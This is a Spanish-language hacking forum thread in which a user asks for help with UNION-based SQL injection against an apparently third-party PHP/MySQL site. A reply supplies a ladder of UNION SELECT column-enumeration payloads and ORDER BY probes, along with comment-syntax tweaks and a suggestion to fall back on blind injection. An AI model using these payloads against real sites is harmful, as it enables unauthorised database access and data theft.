Foro de elhacker.net

hola foreros
estoy tratando de obtener información de una pagina vulnerable(no me gusta hacer maldades solo es un interés académico)
bien reconocí que la pagina es vulnerable por que al ponerle en el url

me voto de resultado


con lo cual ya se que es mysql con php y ademas me pasa un pedaso del query y que es vulnerable

luego al tratar de averiguar cuantas columnas vota la consulta puse

xxxxxxx.php?id=4 order by 10/*

me voto error pero con 9 no con lo que averigüe que tiene 9 columnas

acá viene lo extraño cuando trato de sacar mas información usando union


me vota esta respuesta contradictoria

Lo que YO ejecutaría seria.

4+and+1=0+union+select+all+1+--+
4+and+1=0+union+select+all+1,2+--+
4+and+1=0+union+select+all+1,2,3+--+
4+and+1=0+union+select+all+1,2,3,4+--+
4+and+1=0+union+select+all+1,2,3,4,5+--+
4+and+1=0+union+select+all+1,2,3,4,5,6+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9,10...N+--+


Muchas veces 1 variable via GET es tomada por 2 funciones distintas en la misma web.
Me explico.
Aveces la pagina hace 2 consultas en donde la segunda depende de la primera. es por ello que aveces te tira ese error, siendo que realmente no es la cantidad de campos original en la consulta si no mas bien es de la segunda consulta.

Cambia el /* por el +--+, por cada intento aveces por ese maldito detalle es que no deja generar bien la consulta.


En el Caso que no te muestre nada, explotalo bien blind.

SAludos.

eso sucede cuando tienes una cantidad de columnas diferentes a las columnas devueltas, por eso la cantidad de columnas te resulta 9 pero realmente la query completa debuelve otra cantidad